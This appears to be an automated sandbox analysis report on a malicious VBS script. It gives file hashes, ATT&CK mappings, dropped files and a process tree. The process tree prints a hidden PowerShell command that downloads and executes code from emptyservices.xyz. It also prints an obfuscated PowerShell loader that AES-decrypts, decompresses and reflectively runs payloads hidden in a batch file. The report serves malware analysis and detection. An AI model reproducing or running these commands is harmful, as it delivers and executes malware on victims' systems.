051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320

General

Target

051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs
Size

91KB
MD5

7f67c01cf304afa0adf4c3095477ab07
SHA1

9c5e5e550e15b4e0e949591488ba72154e13378f
SHA256

051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320
SHA512

cbcf82588439f81719c5931b08176de77e3c7d08e22c084836ee3224dbbc6a96ebb4873cb2ac1d6d0225b6f7a8f8cef873fab3b54115e4cd8eb0ec1b623a7737
SSDEEP

1536:M8we4uQyXKFD5cFkWLcaxdYOyhGhRW9w+vcdlziIqzRNBHarEZ+2K:M8z4DOOW4eOFGhRW9wCIzi/8rE42K

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1956	powershell.exe
568	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1956	powershell.exe
568	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 1956	2540	WScript.exe	30
PID 2540 wrote to memory of 1956	2540	WScript.exe	30
PID 2540 wrote to memory of 1956	2540	WScript.exe	30
PID 2540 wrote to memory of 2556	2540	WScript.exe	33
PID 2540 wrote to memory of 2556	2540	WScript.exe	33
PID 2540 wrote to memory of 2556	2540	WScript.exe	33
PID 2556 wrote to memory of 568	2556	cmd.exe	35
PID 2556 wrote to memory of 568	2556	cmd.exe	35
PID 2556 wrote to memory of 568	2556	cmd.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
82KB

MD5
91521a30afc250ec301fbee04e3d72ec

SHA1
20c0d5e15643df6215f5052d70ad46d40da15fdd

SHA256
87f7bfaaf8f6babc9af3cb2b5de96b6365016121332bd90b8905674acd4940c4

SHA512
f9c61a01395eccccbb62ba2ce9cce4678da36b5a67a9712af98965c75cf126a740026bce576fe841b18ba018641842f845c007ad9e62dbde96b5cfd3b5299544

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
16c017acd6ec7ddcd508adb7a68f1eb3

SHA1
a65fb3db6d3dbaf8e0733b89193c058dc2d97f2b

SHA256
b55d361da2ea455689c76b3a4e4492f20a63db772fcc00482c19a7e2dd6774d3

SHA512
69230d83f197a75b87e8ac02e3c1fd00b63da2ece1a51d7072bdfd9f40e070aa6eec2f293ce53a143776a4a619260933b1d4c8531287389e38d5ee2e5f98967a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8GEEY2TO76TWX2BGJX8R.temp

Filesize
7KB

MD5
d27afcb7ae0b8c8cbc6d49afd67a10df

SHA1
fdb413201d39884006dd08ebb595324aab8cb914

SHA256
d88a717591deda5ddd78caa14dcbeb10b646dfdede6a1b05d6c631c9e4b12a4f

SHA512
9df1861ef14f4639a490a90495aac729b3ecb7963b7b89165bc06884473491cff55c971bb4cb242c8a946353f6d602052e8da78644dc263abee0871072137cc7

Download Submit
memory/568-27-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/568-28-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/1956-7-0x000007FEF62B0000-0x000007FEF6C4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-11-0x000007FEF62B0000-0x000007FEF6C4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-10-0x000007FEF62B0000-0x000007FEF6C4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-8-0x000007FEF62B0000-0x000007FEF6C4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-9-0x000007FEF62B0000-0x000007FEF6C4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-4-0x000007FEF656E000-0x000007FEF656F000-memory.dmp

Filesize
4KB

Download
memory/1956-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/1956-6-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing